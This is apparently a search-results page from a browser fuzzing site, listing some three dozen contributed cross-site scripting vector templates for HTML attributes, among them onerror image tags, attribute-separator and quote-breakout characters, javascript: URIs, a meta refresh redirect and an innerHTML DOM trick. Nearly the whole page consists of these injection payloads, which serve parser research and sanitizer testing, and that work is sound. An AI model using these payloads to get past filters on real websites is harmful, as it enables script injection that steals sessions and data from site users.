Featured vector

Chrome 0.0
<!-- sample vector --> <img src=xx:xx 0x0aonerror=alert(1)>

Fuzz vector cloud

3,424,392 Successful fuzzes

Fuzz Vectors

Searching for "attribute"

Your browser identified as

General Crawlers unknown

All vectors

Description Vector Created by
Characters between event handlers <img id="fuzz*num*" src=x onerro*chr*r='xx'> @salchoman
Characters that can go on either side of in attribute <!-- sample vector --> <img src onerror*chr*=*chr*logChr(*num*)> @Lamp_AE
Valid HTML Attribute Seperators <!-- sample vector --> <img*chr*src*chr*onerror=logChr(*num*)> @Lamp_AE
form attribute support <form id='*datahtmlelements*1'> </form> <*datahtmlelements* id='*datahtmlelements*2' form='*datahtmlelements*1'></*datahtmlelements*> <script> if (document.getElementById('*datahtmlelements*2').form == '[object HTMLFormElement]') { customLog('*datahtmlelements*') } </script> @insertScript
Single characters that break attribute names <div *chr*="><img src=xss:xss onerror=logChr(*num*)>"> @garethheyes
Valid characters between attribute and value instead of <img src=xx:xx onerror*chr*logChr(*num*)> @blubbfiction
Replacement characters for between attribute and value <img src=xx:xx onerror*chr*logChr(*num*)> @blubbfiction
Characters allowed between event handlers and equal sign <img src="about:blank" onerror*chr*=logChr(*num*)> @peksa
HTML input image tag attributes that run JavaScript <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="image" src="about:blank"> @peksa
HTML input tag attributes that run JavaScript <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="text"> @peksa
Characters allowed between and in HTML entities in style attribute <div style="x:expression(l&*chr*#x6F;gChr(*num*))"> @tifkin_
characters that behave like equal signs in attribute value <img src== onerror="a*chr*logChr(*num*)"> @JohnathanKuskos
Characters that dont inhibit eventhandlers <img src=xx:xx o*chr*nerror=logChr(*num*)> @tifkin_
Characters that break attribute names <img src=# aaa*chr*onerror="logChr(*num*)"> @albinowax
Characters allowed between attributes <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> @tifkin_
Characters allowed within an attribute name (on()load) "'><img src="xx:xx" on*chr*error="log(*num*);"> @skeptic_fx
Characters transformed in expando attributes <div id="fuzzelement*num*" expando*chr*="123">test</div> @garethheyes
Expandos attributes characters removed <div id="fuzzelement*num*" expando*chr*=123>test</div> @garethheyes
meta refresh tag content attribute url overwrite <!-- sample vector --> <META HTTP-EQUIV="refresh" CONTENT="0.1; URL=javascript:void()//?*chr*;URL=javascript:logChr(*num*)//"> @olemoudi
Break out of HTML element from single quoted attribute <img src='xx:x*chr*><img src=xx:x onerror=logChr(*num*)>'> @peksa
Escaped characters that break out of single quote HTML attribute <img src='xx:x\*chr* onerror="logChr(*num*)">'> @peksa
Characters syntactically equivalent to double quote in HTML attributes `"'><img src="#*chr* onerror=log(*num*)> @p_laguna
Attribute separators <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> @garethheyes
Characters separating attributes without quotes after hash <img src=xx:xx#*chr*/onerror=logChr(*num*)> @garethheyes
Characters separating attributes without quotes <img src=xx:xx alt=`*chr*/onerror=logChr(*num*)//`> @garethheyes
Execute XSS through previousSibling replace in DOM using innerHTML and escaping right angle bracket <body> §iframe onload=confirm(/xss/)&gt; <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body> *urlenc* @secalert
Characters ignored in html event handler name <img src=x on*chr*Error="javascript:log(*num*)"/> @mhswende
Characters allowed between tag and attribute <script*chr*type="text/javascript">log(*num*);</script> @0xAli
Characters which break attributes without quotes <b id="id*num*" x=begin*chr*end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id*num*').getAttribute('x'))) { log(*num*);}</script> @shafigullin
Characters to separate class names in class attributes <div class="foo*num**chr*bar">HELLO</div> <script>document.getElementsByClassName('foo*num*')[0]?log(*num*):0</script> @0x6D6172696F
Characters allowed attribute quote "/><img/onerror=*chr*log(*num*)*chr*src=xxx:x /> @jackmasa
determine any chars can go between the onerror attributes <img src="x"*chr**chr*o*chr*n*chr*error="alert(*num*)"> @MisterJyu
Characters syntactically equivalent to single quote in HTML attributes `"'><img src='#*chr* onerror=log(*num*)> @_cweb
Characters syntactically equivalent to colon in a URI <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> @_cweb
Escape from attribute a closing tag <a href="*chr*><script>log(*num*)</script>" /> @shafigullin
Characters allowed after attribute name `"'><img src=xxx:x onerror*chr*=log(*num*)> @garethheyes
Characters allowed before attribute name `"'><img src=xxx:x *chr*onerror=log(*num*)> @garethheyes